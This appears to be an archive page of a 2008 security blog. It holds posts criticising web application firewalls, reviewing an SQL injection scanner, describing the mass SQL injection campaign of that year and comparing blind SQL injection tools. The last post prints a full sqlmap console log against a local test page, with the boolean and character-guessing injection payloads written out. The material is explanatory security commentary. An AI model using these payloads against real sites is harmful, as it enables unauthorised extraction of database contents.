Friday, June 27, 2008

Waf me not

| Armando Romeo |
Which side of the field are you in?

There's only one hot topic in the industry right now:
Web application firewalls.

Infosec big names are fighting a war worth millions dollars on the Web Application Firewalls as a viable solution to web application security issues.

Understanding the parties in the field is critical to understand the discussion and not being fooled by subliminal marketing messages.


A CTO of a company X, in order to become PCI compliant, reads the compliance paper. And there is written that you have two options:
Source code review
OR
Web application Firewall

What kind of expectations does he have here from a WAF? He trusts the PCI standard. He thinks that if WAF is an alternative to source code analysis then they provide more or less the same security.

So, WAF vendors, empowered by PCI compliances, can push their products and advertise them as a security plug-n-play solution.

There's nothing worse than a false sense of safety.

Feeling self confident about security because you have a WAF in front of your Web Server is the beginning of all your problems.

I have read some WAF vendor commenting on some blog posts. They are all like "yes, we never said it is a bullet-proof indeed it's just part of a broader solution we offer".

What kind of other broader solution? VA+WAF ?
Is this really the security companies need?
Do you really think that automated tools (the ones we have now) are capable of securing something?

Automated tools that miserably fail to detect even blind sql injections or CSRF vulnerabilities that suggest the rules to a WAF that is miserably unable to protect against simple, very simple coding errors like the proper check of an authentication cookie a logic flaw or an information leakage bug?

And no, taking the web to what it was 3-4 years ago, by encrypting querystring to prevent tampering is not the solution in my opinion.
The trade off between business and security should be avoided as much as possible.

There's also a big difference from security needed and security required.

WAF's responds to a demand for required security.
A provable security.

"Hey I do care about my customers data. I have a WAF!"

A honest security consultancy company carrying out penetration testing and source code review responds to a security need.

"Hey I do care about my customers data. I have plenty of good guys trying to hack and fix me every month"

At SecurityBrigade, we do not push any WAF sale although we recognize it as a valid means to avoid common simple (but still dangerous) vulnerabilities.

We promote real (expert)man-made penetration testing jobs and source code reviews.

WAFs as further layers are proposed to clients in order to allow them to be covered from cases in which code changes from some reason and new vulnerabilites are introduced since our last review.
It must be made clear that the more they get distant from the source code reviewed the less the security level is. No matter how cool the WAF is.

Another aspect to take in consideration is the operational cost of such devices. Are they, all in all, worth the money?
Let's forget about PCI for a moment, are they really responding to the need for real Security? Not at the moment.
They are resonding to a quick-need for security.
That in the long run it becomes "cheap security".
And cheap refers to quality not to expense.

And by the way, I'm from the old-school side. I like innovation.
But we have to spend more on people not on technology.

Because my hotel in Paris, while writing this blog post, has asked me to send my credit card number by email.
Would a WAF solve that?

Tuesday, June 24, 2008

HP and MS give us a new SQL Injection tool

| Armando Romeo |

Just downloaded it and trying it while I write.
After the recent Mass SQL injection attacks Microsoft decided to call HP (who owns SPI labs) to create a tool to detect potential SQL injections in a site

The tool name is Scrawlr and is downloadable from HP here.

It first acts as a crawler (Sql injection Crawler).
Then makes a list of dynamic pages and finally tries to inject sql injection payload to proof the existence of the vulnerability



I must say it is nothing impressive. It is limited in the number of links crawled (it picked up just a little fraction of the actual link in my local Joomla installation).


I even created a simple page with a basic blind SQLi vulnerability but it didn't recognize the injection.
It's just a matter of comparing two outputs based on two different attack payloads. But nothing. It seems the tools only looks for known SQL errors in the returned page and no blind sql injection detection.

Further tests should be done but it's 2 am in Italy, so I hope to read your comments about the tools when I wake up...

Monday, June 23, 2008

Penetration testing as an art

| Armando Romeo |

I found Chris Eng post about the correct definition of Penetration testing quite interesting. Whether you consider it an art or a science is not just a play on words or a way to make you feel Einstein or Michelangelo.

It's a way to have it carried out in the correct way.

Into Penetration testing, the approach ( modus operandi ) is most of the time much more important than the tools or checklists you use.



While someone thinks, aided by the so many checklist-type security being trendy recently, that penetration testing is a science, there's a lot of other experts who look at it as an art.

I believe both are wrong. Security is known to be one of the most difficult problems an engineer has to solve. Above all you stand from the good-guys side.

Only people in this room will understand what I am now going to say. It is this: Security is perhaps the most difficult intellectual profession on the planet


This is what Dan Geer's said in a keynote at SOURCE Boston.

Actually it's this difficulty that makes someone think that security and specifically penetration testing is an art and not a science.

It's not, IMHO, that a problem has too many variables and factors to take into consideration in order to be solved that it takes some talented mind to actually do it. It's all a matter of skills in this case.

If you could master all the possible aspects, details, behaviours and even the most hidden tricks of the system you're pentesting probably it would merely be a science since it would engage your experience/skills and not your talent as a genius mind.

It would just require your past knowledge and not your intuition.

There's a sharp distinction between the intellect and the experience.

The problem is that you can never know all the details, behaviours and features of your target because every target has its level of uniqueness.

And this is where the innate ability of intuition comes in handy, or better comes in *necessary* to master the most difficult intellectual profession on the planet.

It's just here that the science leaves the scene to the art.

A talented penetration tester wouldn't only mark the check lists but would find new unlinested methods to achieve his goal of breakinf/securing the system he's on.

Logic flaws comes to my mind here. But how could I forget about social engineering. In the end, Mitnick is probably the most renowned hacker ever just because of his innate talent. I don't remember of him being celebrated for elite attacks learned into some ethical hacker certification course.
(That you have to master anyway if you want to enter the field).

Both social engineers and all those flaws related to logic cannot be solved through a scientific approach to the problem. No tools baby and no checklist.

That's why I believe that, yes, penetration testing, must have an agreed
and standardized scientific approach, based on checklist, best practices etc.
But for each checks in that list, for each of those steps in the scientific/deterministic process of penetration testing there must be space for further investigation left for talent.

And Talent is not something you achieve with CISSP. You're right dre.
Day by day hands-on practice is the only training for your talent.

If I needed a penetration tester I would ask him how many years of experience he had in the trenches rather than how many certs.
And possibly if he had a past as a hacker.
Real hackers have some talent, and hands on practice by definition.

I don't believe into born-white-hat security professionals.
No matter how CISSP they are are.
Do you?

Thursday, June 19, 2008

Have you been hit by Mass SQL Injection?

| Armando Romeo |

Mass Sql injection has been the most important threat being experienced by the
security (and web masters) community from April 2008 until now.

Over 510.000 servers have been successfully exploited using the same payload and a few variants of the same exploit.

At first the attack was believed to be a malware able to propagate on vulnerable servers through SQL commands.


A further forensic study demonstrated how the attack is instead generated by thousands of bots crawling the net for vulnerable web applications. Asprox botnet (15.000 infected hosts as of March 08) above all.

The potential targets are recognized through google dorks and the attack starts injecting a payload able to replace all the string-type field of the database with a javascript payload being downloaded from certain domain names.

The javascript would have been finally executed on the vulnerable websites visitors in order to attempt a forced download of an online gaming trojan horse as well as adwares. Or just more Asprox listeners...

Targeted web applications seemed to be only ASP web pages using Microsoft SQL Server, but more variants of this kind of attack are being discovered targeting different languages and different servers platforms.

The exploitation is made possible due to poorly written web applications while
no vulnerabilities exist into IIS/SQL server for sake of clarity.

A tool is available to check wether your webserver has been hit by Danmec/Asprox botnet: SQLInjectionFinder.

It basically scans your IIS logs looking for known exploit payload like "CAST(" statements. This tool is much better than running an automated scanning tool against your web site scripts although secure scripts or a WAF "in front" of them would have surely mitigated the attack impact.

Time to acquire some WAF vendors' stocks now.

Monday, June 16, 2008

Optimized Blind Sql Injection

| Armando Romeo |
Blind sql injection is a technique that let hackers retrieve database data through a sql injection that doesn't give out useful information through web application errors.

Security by obscurity is not security though. Sqlmap and Absinthe demonstrate this clearly. They are capable of getting you the whole database even if no error is shown when user inputs characters meant to
trigger an sql error.


So how is it possible to still get database data without triggering web application errors?
These tools basically work on a true/false base. They provide the web app with input known to be faulty to trigger a FALSE case and input known to be working to trigger a TRUE case.

Using a TRUE/FALSE condition a loop through the charset is undertaken to recover a string in the database one character at a time. Usually the SUBSTRING/CONCAT sql commands are used to match a correct guess with the TRUE case.

The problem with this approach is the time it takes to retrieve data from the database.
Most of the tools for blind sql injection are not optimized.
Recently I came across with a nice research from Secforce.

They have written a quick tool to optimize the task of dumping a database through a blind sql injection.

The tool, written in python is basically a shell.
You provide parameters like vulnerable web page and then it will retrieve the desired portion of database (table names, column names or full data), nothing different from all the other sql injection tools.

What makes this tool better than the others (for blind sqli) is its speed thanks to the optimizations used to find characters.
You can read more about the implemented optimizations here.
From a test I personally undergone I noticed that sqlmap is the tool that is best (together with secforce blind sql injection tool) at dumping data through blind sql injection.

Here's the dump from the console of an injection process using sqlmap:


C:\hack\SQL\sqlmap>sqlmap.py --url="http://localhost/vuln.asp?i=6" -p i -v 3 -b --string="Ciao"

sqlmap/0.6-rc5 coded by inquis
and belch

[14:33:38] [DEBUG] request:http://localhost/vuln.asp?i=6
[14:33:43] [INFO] testing if GET parameter 'i' is dynamic
[14:33:43] [DEBUG] request:http://localhost/vuln.asp?i=47
[14:33:46] [INFO] confirming that GET parameter 'i' is dynamic
[14:33:46] [DEBUG] request:http://localhost/vuln.asp?i='NoValue

[14:33:48] [DEBUG] request:http://localhost/vuln.asp?i="NoValue

[14:33:50] [INFO] GET parameter 'i' is dynamic
[14:33:50] [INFO] testing sql injection on GET parameter 'i'
[14:33:50] [INFO] testing numeric/unescaped injection on GET parameter 'i'

[14:33:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
3
[14:33:52] [DEBUG] request:http://localhost/vuln.asp?i=6 AND 3=
4
[14:33:55] [INFO] confirming numeric/unescaped injection on GET parameter 'brand
id'
[14:33:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND No
Value
[14:33:57] [INFO] GET parameter 'i' is numeric/unescaped injectable
[14:33:57] [INFO] testing MySQL
[14:33:57] [INFO] query: CONCAT('6', '6')
[14:33:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 63
[14:33:58] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 31
[14:34:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 15
[14:34:03] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 7
[14:34:05] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 3
[14:34:07] [DEBUG] request:http://localhost/vuln.asp?i=6 AND OR
D(MID((CONCAT(CHAR(54), CHAR(54))), 1, 1)) > 1
[14:34:09] [INFO] retrieved:
[14:34:09] [INFO] performed 6 queries in 12 seconds
[14:34:09] [WARNING] the remote DMBS is not MySQL

As you can see from the above, sqlmap starts trying to understand if the first character of our banner
has an ascii value greater of 63 (that is 127/2). Not in our case.

[14:34:09] [INFO] testing Oracle
[14:34:09] [INFO] query: LENGTH(SYSDATE)
[14:34:09] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 63
[14:34:11] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 31
[14:34:13] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 15
[14:34:15] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 7
[14:34:17] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 3
[14:34:19] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((LENGTH(SYSDATE)), 1, 1)) > 1
[14:34:21] [INFO] retrieved:
[14:34:21] [INFO] performed 6 queries in 12 seconds
[14:34:21] [WARNING] the remote DMBS is not Oracle
[14:34:21] [INFO] testing PostgreSQL
[14:34:21] [INFO] query: COALESCE(5, NULL)
[14:34:21] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 63
[14:34:23] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 31
[14:34:25] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 15
[14:34:27] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 7
[14:34:29] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 3
[14:34:32] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTR((COALESCE(5, NULL)), 1, 1)) > 1
[14:34:34] [INFO] retrieved:
[14:34:34] [INFO] performed 6 queries in 12 seconds
[14:34:34] [WARNING] the remote DMBS is not PostgreSQL
[14:34:34] [INFO] testing Microsoft SQL Server
[14:34:34] [INFO] query: LTRIM(STR(LEN(1)))
[14:34:34] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 63
[14:34:36] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 31
[14:34:38] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 47
[14:34:41] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 55
[14:34:43] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 51
[14:34:45] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 49
[14:34:46] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 1, 1)) > 48
[14:34:48] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 63
[14:34:50] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 31
[14:34:53] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 15
[14:34:55] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 7
[14:34:57] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 3
[14:35:00] [DEBUG] request:http://localhost/vuln.asp?i=6 AND AS
CII(SUBSTRING((LTRIM(STR(LEN(1)))), 2, 1)) > 1
[14:35:03] [INFO] retrieved: 1
[14:35:03] [INFO] performed 13 queries in 28 seconds
remote DBMS: Microsoft SQL Server

The process above is discussed in the paper released by secforce.
Sqlmap has retrieved the database banner/version in approx. 60 seconds.

Blind SQL Injection shell has done in 80 seconds due to the fact that it retrieves all the chars one by one thus being able to retrieve any kind of banner with 100% precision while sqlmap requires the matching of few chars to match it with default banners.

A video to show the basic functions of the tools is available from secforce tool page. Only con: it doesn't support the use of a proxy as of now. (It's open source so anyone can add this feature easily)

Free Security Magazines